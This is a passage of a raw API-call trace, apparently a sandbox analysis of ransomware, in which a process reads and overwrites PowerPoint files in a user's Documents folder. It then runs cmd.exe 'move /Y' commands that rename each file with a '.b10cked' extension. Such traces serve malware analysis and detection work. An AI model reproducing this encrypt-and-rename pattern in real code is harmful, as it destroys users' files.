dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x391a [0233.970] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.970] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.970] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.970] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3e02 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3e02 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.971] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1f00, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1f00, lpOverlapped=0x0) returned 1 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.971] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1f00, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1f00, lpOverlapped=0x0) returned 1 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-7936, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1f02 [0233.971] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1f00, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1f00, lpOverlapped=0x0) returned 1 [0233.971] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-7936, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1f02 [0233.971] WriteFile (in: hFile=0x1b4, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1f00, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1f00, lpOverlapped=0x0) returned 1 [0233.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UFl3tyKJKu.ppt", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0233.975] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UFl3tyKJKu.ppt", cchWideChar=14, lpMultiByteStr=0x131322c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UFl3tyKJKu.ppt", lpUsedDefaultChar=0x0) returned 14 [0233.975] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3e02 [0233.975] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0233.975] CloseHandle (hObject=0x1b4) returned 1 [0233.976] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\UFl3tyKJKu.ppt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT") returned 0x2f [0233.977] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0233.977] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFL3TY~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\UFl3tyKJKu.ppt.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xc24, dwThreadId=0x794)) returned 1 [0233.987] CloseHandle (hObject=0x120) returned 1 [0233.987] CloseHandle (hObject=0x1b4) returned 1 [0233.987] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0233.987] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0233.987] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 2 [0233.987] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.987] ReleaseMutex (hMutex=0xf8) returned 1 [0233.987] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.987] ReleaseMutex (hMutex=0xf8) returned 1 [0233.987] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.987] ReleaseMutex (hMutex=0xf8) returned 1 [0233.987] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0233.987] ReleaseMutex (hMutex=0xf8) returned 1 [0233.987] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\wj5G.ppt" (normalized: "c:\\users\\eebsym5\\documents\\fcfnnekyscvehrxmenn\\wj5g.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29077694539) returned 1 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xc30 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.988] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xc30 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0233.989] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x748 [0233.989] ReadFile (in: hFile=0x1b4, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xc30 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xc30 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.990] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x617, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x617, lpOverlapped=0x0) returned 1 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0233.990] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd68*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd68*, lpNumberOfBytesWritten=0x12ec1c*=0x617, lpOverlapped=0x0) returned 1 [0233.990] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1559, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x619 [0233.990] ReadFile (in: hFile=0x1b4, lpBuffer=0x1273a88, nNumberOfBytesToRead=0x617, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a88*, lpNumberOfBytesRead=0x12ec08*=0x617, lpOverlapped=0x0) returned 1 [0233.991] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=-1559, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x619 [0233.991] WriteFile (in: hFile=0x1b4, lpBuffer=0x123fd68*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd68*, lpNumberOfBytesWritten=0x12ec1c*=0x617, lpOverlapped=0x0) returned 1 [0234.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wj5G.ppt", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0234.099] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="wj5G.ppt", cchWideChar=8, lpMultiByteStr=0x13131ec, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wj5G.ppt", lpUsedDefaultChar=0x0) returned 8 [0234.099] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xc30 [0234.099] WriteFile (in: hFile=0x1b4, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0234.100] CloseHandle (hObject=0x1b4) returned 1 [0234.100] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\wj5G.ppt", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt") returned 0x2b [0234.101] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\") returned 0x23 [0234.101] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\wj5G.ppt.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xfa8, dwThreadId=0xb1c)) returned 1 [0234.131] CloseHandle (hObject=0x120) returned 1 [0234.131] CloseHandle (hObject=0x1b4) returned 1 [0234.131] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0234.131] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\fcfnnEKYsCveHRXmenn\\", cchLength=0x2f | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\") returned 0x2f [0234.131] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount1=47, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\FCFNNEKYSCVEHRXMENN\\", cchCount2=47) returned 2 [0234.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.131] ReleaseMutex (hMutex=0xf8) returned 1 [0234.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.131] ReleaseMutex (hMutex=0xf8) returned 1 [0234.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.131] ReleaseMutex (hMutex=0xf8) returned 1 [0234.131] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0234.131] ReleaseMutex (hMutex=0xf8) returned 1 [0234.131] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\fUt5wrAPeTu.pptx" (normalized: "c:\\users\\eebsym5\\documents\\fut5wrapetu.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b4 [0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.131] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29092054304) returned 1 [0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.131] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x8bd5 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0234.132] SetFilePointer (in: hFile=0x1b4, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 